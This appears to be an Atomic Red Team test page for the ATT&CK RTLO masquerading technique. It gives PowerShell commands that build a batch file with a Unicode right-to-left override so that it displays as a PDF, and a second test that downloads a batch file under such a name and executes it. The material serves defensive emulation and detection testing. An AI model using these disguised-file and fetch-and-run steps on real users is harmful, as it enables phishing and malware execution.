T1036.002
Masquerading:Right-to-Left Override
Description from ATT&CK
Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named
March 25 \u202Excod.scrwill display asMarch 25 rcs.docx. A JavaScript file namedphoto_high_re\u202Egnp.jswill be displayed asphoto_high_resj.png.(Citation: Infosecinstitute RTLO Technique)Adversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with Spearphishing Attachment/Malicious File since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.
Atomic Tests
- Atomic Test #1: Masquerading: Right-to-Left Override Batch File Creation and Execution
- Atomic Test #2: Masquerading: RTLO Masqueraded File Download and Execution
Atomic Test #1: Masquerading: Right-to-Left Override Batch File Creation and Execution
'Creates a batch file and then uses the RTLO operator (0x202E) to transform the file name from "evil_batchfdp.bat" to "evil_batchtab.pdf". The script then executes the batch file which displays "Hello World!" for 30 seconds before closing out.'
Supported Platforms: Windows
auto_generated_guid: d7c03c7e-31cd-43c7-859a-ec053f73b23a
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| fileloc | Input the file location. Default is the desktop. | path | [System.IO.Path]::Combine($env:USERPROFILE, "Desktop") |
Attack Commands: Run with powershell!
$filepath = #{fileloc}
$rtlo = [char]0x202E
$fileloc = Join-Path "$filepath" ("evil_batch" + $rtlo + "fdp.bat")
$payload = @"
@echo off
echo Hello World!
timeout /t 30 /nobreak
exit
"@
Set-Content -Path $fileloc -Value $payload -Encoding Ascii -Force
Write-Host "Real filename on disk: $fileloc"
Write-Host "Displays in explorer as: evil_batchtab.pdf"
Start-Process -FilePath $fileloc -WaitCleanup Commands
$rtlo = [char]0x202E
$filepath = #{fileloc}
$fileloc = Join-Path "$filepath" ("evil_batch" + $rtlo + "fdp.bat")
Remove-Item -Path $fileloc -Force -ErrorAction SilentlyContinueAtomic Test #2: Masquerading: RTLO Masqueraded File Download and Execution
Downloads a batch file that has an obfuscated name utilizing the RTLO operator. The batch file then runs automatically, opening a cmd window and then closing 30 seconds later
Supported Platforms: Windows
auto_generated_guid: dac81590-8b63-4769-8b82-310beedc4f09
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| fileloc | Location you want to download the file to. Default is the downloads folder | path | [System.IO.Path]::Combine($env:USERPROFILE, "Downloads") |
Attack Commands: Run with powershell!
$rtlo = [char]0x202E
$filepath = #{fileloc}
$fileloc = Join-Path "$filepath" ("evil_batch" + $rtlo + "fdp.bat")
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1036.002/src/evil_batch.bat" -OutFile $fileloc -UseBasicParsing | Out-Null
Start-Process -FilePath $filelocCleanup Commands
$rtlo = [char]0x202E
$filepath = #{fileloc}
$fileloc = Join-Path "$filepath" ("evil_batch" + $rtlo + "fdp.bat")
Remove-Item -Path $fileloc -Force -ErrorAction SilentlyContinueAtomic test(s) for this technique last updated: 2026-05-12 08:14:29 UTC